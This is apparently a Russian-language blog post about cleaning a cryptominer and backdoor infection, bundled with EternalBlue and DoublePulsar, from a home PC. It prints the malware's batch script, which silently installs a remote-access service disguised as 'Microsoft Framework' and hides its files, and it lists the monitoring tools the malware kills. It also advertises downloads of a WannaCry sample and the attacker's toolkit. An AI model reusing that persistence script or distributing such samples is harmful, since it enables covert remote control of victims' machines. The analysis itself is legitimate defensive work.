Темная февральская ночь, но как всегда не спиться. И уже совсем и непомню когда в последний раз я видел мало-мальский интересный вирус. Вспоминая время лет 10 назад, моя коллекция заполнялась ими практически каждый день. Банеры, Кейлогеры, Буткиты, MBR-локеры, Backdoor(ы), Банковские трояны и даже парочка руткитов. Сейчас как-то всё больше встречаются потенциально нежелательные программы с функцией рекламы, скатился до простой оптимизации. Потратив ночку и написав парочку оптимизирующих скриптов под консоль Windows, можно решить множество насущных проблем системного администратора, автоматизировать операционную систему и до минимума сократить время настройки плохо оптимизированных или новых систем.

Но с пару месяцев назад чудо всё таки произошло, была типичная жалоба на торможение компьютера, невозможностью играть в «танки» , плохой пинг и нагрев процессора.
Майнинг Вирус + Backdoor, InternalBlue, DoublePulsar, WannaCry, Miner Monero далеко не полный перечень хакерского арсенала, обнаруженного на кануне.
Первичный осмотр довольно быстро показал на наличие вредоносного процесса в системе, деятельность которого потребляла приличное количество оперативной памяти и нагружала процессор почти до максимума в режиме простоя.  Говоря по простому, вирус имел простейшие навыки маскировки и манипуляции с системными программами, имел несколько модулей и представлял не малую угрозу как для владельца компьютера, так и для окружающих, так как вирус нёс в себе возможность заражения удалённых машин. Опыт работы с такими программами всегда в радость.

Кратко о возможностях

1 Отслеживание запуска диспетчера задач и его аналогов. Закрытие процессов по имени посредством Taskkill.
2 Манипуляция безопасностью (icacls takeown) для укрепления в системе и возможность использовать привилегии администратора и других системных учетных записей.
3 Сокрытие в системе использование команды Attrib
4 Установка удаленного доступа, посредством установки службы RManService (замаскирована под Microsoft Flamework)
5 Регистрация собственного набора библиотек (RunDLL)
6 Кейлогер, возможно стиллер со сбором паролей в текстовой файл
7 Майнер CPU для майнинга Monero.
8 Запись в назначенные задания Schtasks.exe
9 Изменения функций защитника Windows и брандмауэра через системные реестр regedit.
10 Набор для эксплуатации эксплойтов 2017 года в частности уязвимость SMB v1  чем пользовался шифровщик WannaCry.
(Был обнаружен backdoor  doublepulsar естественно в связке с EnternalBlue)
Ну и конечно же я с радостью обнаружил отличный экземпляр в коллекцию, модификацию опаснейшего вируса шифровальщика Ransom:Win32/WannaCrypt.H

WannaCry Download

Как же ругался встроенный защитник когда вся коллекция файлов была распакована и принята к изучению.

Пытаясь отследить вирус, мною были предприняты попытки запустить ряд утилит с графическим интерфейсом для удобства, но все попытки были безуспешны. Далее я нашел конфигурационный файл со списком процессов, которые должны были блокироваться
taskmgr.exe
ProcessHacker.exe
perfmon.exe
procexp.exe
procexp64.exe
procexp32.exe
resmon.exe
autoruns.exe
procmon.exe
aida64.exe
rpexplorer.exe
anvir.exe

Ну так себе развлечение, делается это просто командой tasklist > D:\ProccesList.txt
Всё список процессов с именем,PID и MemUsage доступен. Можно используя команду taskkill /F /PID 555 для принудительного завершения процесса с PID значением 555.

В таких случаях в начале работы никогда не использую антивирусы, они больше мешают, так как удаляют лишь некоторые файлы или библиотеки, а большую часть полезной и интересной информации можно добыть, напрямую просматривая консольные скрипты для запуска, файлы конфигурации и лог файлы. Так же по ним легко отследить папки с отдельными модулями, в нагрузке может идти что угодно, начиная рекламным вирусом, заканчивая полным доступом к заражённому компьютеру.

Так и здесь я обнаружил клиентский модуль RSM, благородно сконфигурированным посредством bat-файла.

RSM client

regedit /s «reg1.reg»
regedit /s «reg2.reg»

timeout 2

rutserv.exe /silentinstall
rutserv.exe /firewall
rutserv.exe /start

ATTRIB +H +S C:\Programdata\Windows\*.*
ATTRIB +H +S C:\Programdata\Windows

sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
sc config RManService obj= LocalSystem type= interact type= own
sc config RManService DisplayName= «Microsoft Framework»

Твики реестра, как я писал выше, заточены на изменения в реестре ключей для служб безопасности и брандмауэра.

Продолжив разбор странных файлов запущенных от имени текущей учетной записи, обнаружил несколько странных программ имевших названия системных процессов Windows. Как положено им стоило быть запущенными от System или Local Service, это был явная попытка скрыть истинное назначение файлов. В таком ключе были найдены ещё несколько папок с различными инструментами хакера.  Архив с программами для эксплуатации уязвимости запаролен. Проблема эта решена и весь инструментарий перекочевал в архив RunDLL.

Так же в наборе присутствовал майнер, который тоже был бережно скопирован в архив.

Суть всех манипуляций сводиться к тому чтобы найти все части вируса-ботнета, аккуратно удалить всё это из системы, провести диагностику работоспособности и по необходимости запустить команды для восстановления критических данных.

Устанавливаем антивирус , прогоняем если нет уверенности в полном удалении вирусов.  Подозрительные файлы, можно прогнать через мультисканер VirusTotal

По окончании работы, создаём точку восстановления в rstrui.

В этом случаи компьютер обрёл свою производительнось, нагрузка на память и процессор полностью упала. Заражением WannaCry фотографий, документов не было. Удалённый доступ был деактивирован к сожалению хакера. Служба RSM была удалена из списка служб. Пинг стал стабильным. Человек завел мотор своего танка и смело отправился в бой.

Хотите проверить свою систему на уязвимость enternalblue? Скачайте это инструмент и запустите сканирование

Полный набор собранных инструментов, можно скачать по этой Ссылке.
(Использование данных инструментов для воздействия на вычислительную машину может повлечь уголовную ответственность.
Все файлы предоставлены для ознакомления с техникой злоумышленника в системе.)